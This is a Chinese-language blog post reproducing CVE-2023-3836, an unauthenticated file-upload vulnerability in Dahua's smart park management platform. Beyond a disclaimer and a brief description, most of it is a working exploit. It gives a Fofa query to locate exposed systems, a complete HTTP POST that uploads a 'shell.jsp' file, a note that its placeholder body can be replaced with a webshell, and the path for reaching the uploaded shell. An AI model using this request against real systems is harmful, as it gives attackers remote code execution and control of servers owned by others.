Advertisement

大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)

阅读量:

大华智慧园区综合管理平台文件上传漏洞

  • 免责声明
    • 漏洞具体说明
    • 漏洞潜在影响分析
    • 利用Faker源获取相关数据
    • 漏洞复现过程:
      • 1. 构造一个POC(Proof of Concept)
      • 2. 实现对目标系统的复制
      • 3. 导致访问目标系统的 shell 地址

免责声明

仅用于技术交流的目的在于向相关安全人员展示漏洞利用方式,从而帮助其提升网络安全意识和技术能力。
任何人不得擅自运用该文章进行非法攻击,同时不得侵害他人隐私及财产权益。
为了确保测试的合法性和安全性,请严格遵守相关规定并在授权范围内使用本文内容。
本文作者不对因使用该文章导致的任何直接或间接损失负有责任,风险均由使用者自行承担。

漏洞描述

大华智慧园区综合管理平台是一个依托智能物联技术构建的园区全方位数字化管理解决方案,在涵盖园区安防、办公与运营等多方面的数字化管理功能上具有显著优势。该平台(截至 20230713 版本)存在文件上传漏洞问题:未获得授权的攻击者可以通过上传恶意Webshell JSP文件实现远程控制执行(RCE)利用

漏洞危害

未经授权的攻击者可通过上传jsp的webshell造成rce,获取服务器权限

Fofa检索

app=“dahua-智慧园区综合管理平台”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

复制代码
    POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
    Host: ip:port
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    Content-Type: multipart/form-data; boundary=---------------------------23866052015499226143339905740
    Content-Length: 1176
    
    -----------------------------23866052015499226143339905740
    Content-Disposition: form-data; name="upload"; filename="shell.jsp"
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    
    123
    -----------------------------23866052015499226143339905740--
    
    
    Java
    
    
![](https://ad.itadn.com/c/weblog/blog-img/images/2025-08-18/m4DbtSRE701zHcaNO89lhVn5gBsx.png)

2. 复现

在这里插入图片描述

123可修改为webshell

3. 访问shell地址

复制代码
    http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp
    
    
    bash
在这里插入图片描述

全部评论 (0)

还没有任何评论哟~